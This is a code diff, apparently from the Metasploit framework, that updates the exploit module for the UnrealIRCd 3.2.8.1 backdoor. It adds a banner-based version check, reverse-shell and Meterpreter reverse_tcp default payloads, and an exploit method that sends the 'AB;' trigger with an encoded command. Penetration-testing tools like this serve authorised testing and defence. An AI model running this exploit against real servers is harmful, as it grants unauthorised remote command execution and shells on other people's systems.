Unreal_ircd_3281_backdoor: Add checks & Targets

modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb

@@ -25,23 +25,46 @@ def initialize(info = {})
           [ 'OSVDB', '65445' ],
           [ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt' ]
         ],
-        'Platform' => ['unix'],
-        'Arch' => ARCH_CMD,
+        'DisclosureDate' => '2010-06-12',
         'Privileged' => false,
         'Payload' => {
           'Space' => 1024,
-          'DisableNops' => true,
-          'Compat' =>
-                        {
-                          'PayloadType' => 'cmd',
-                          'RequiredCmd' => 'generic perl ruby telnet',
-                        }
+          'DisableNops' => true
         },
         'Targets' => [
-          [ 'Automatic Target', {}]
+          [
+            'Unix Command (Generic)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse'
+              },
+              'Payload' => {
+                'Compat' => {
+                    'PayloadType' => 'cmd',
+                    'RequiredCmd' => 'generic perl ruby telnet',
+                }
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
+              }
+            }
+          ]
         ],
         'DefaultTarget' => 0,
-        'DisclosureDate' => '2010-06-12',
+        'DefaultOptions' => {
+          'wfsDelay' => 30
+        },
         'Notes' => {
           'Reliability' => UNKNOWN_RELIABILITY,
           'Stability' => UNKNOWN_STABILITY,
@@ -57,25 +80,54 @@ def initialize(info = {})
     )
   end
 
-  def exploit
-    connect
+  def unreal_version?(response)
+    response.match?(/unreal3\.2\.8\.1/i)
+  end
 
-    print_status("Connected to #{rhost}:#{rport}...")
-    banner = sock.get_once(-1, 30)
-    banner.to_s.split("\n").each do |line|
-      print_line("    #{line}")
+  def send_irc_command(cmd="")
+    unless cmd.empty?
+      vprint_status("#{cmd}")
+      sock.put("#{cmd}\n")
+    end
+    r = sock.get_once(-1, 10).to_s
+    r.split("\n").each do |line|
+      vprint_line("    #{line}")
     end
+    r
+  end
 
-    print_status("Sending backdoor command...")
-    sock.put("AB;" + payload.encoded + "\n")
+  def check
+    vprint_status("Connecting to IRC service")
+    connect
+    print_status("Connected to #{rhost}:#{rport}")
 
-    # Wait for the request to be handled
-    1.upto(120) do
-      break if session_created?
+    vprint_status("Checking IRC banner")
+    return Exploit::CheckCode::Appears if unreal_version?(send_irc_command)
 
-      select(nil, nil, nil, 0.25)
-      handler()
-    end
+    irc_user = Faker::Internet.username(specifier: 3..9)
+    print_status("Trying to register a new IRC user: #{irc_user}")
+    send_irc_command("NICK #{irc_user}")
+    # Not checking for PING/PONG
+    response = send_irc_command("USER #{irc_user} 0 * #{irc_user}")
+    return Exploit::CheckCode::Appears if unreal_version?(response)
+
+    commands = %w[VERSION INFO CREDITS MOTD BOTMOTD HELP LICENSE]
+    return Exploit::CheckCode::Appears if
+      commands.any? { |cmd| unreal_version?(send_irc_command(cmd)) }
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    # Connect to the IRC service
+    vprint_status("Connecting to IRC service")
+    connect
+    print_status("Connected to #{rhost}:#{rport}")
+
+    print_status("Sending IRC backdoor command")
+    sock.put("AB;" + payload.encoded + "\n")
+
+    # Finished with IRC
     disconnect
   end
 end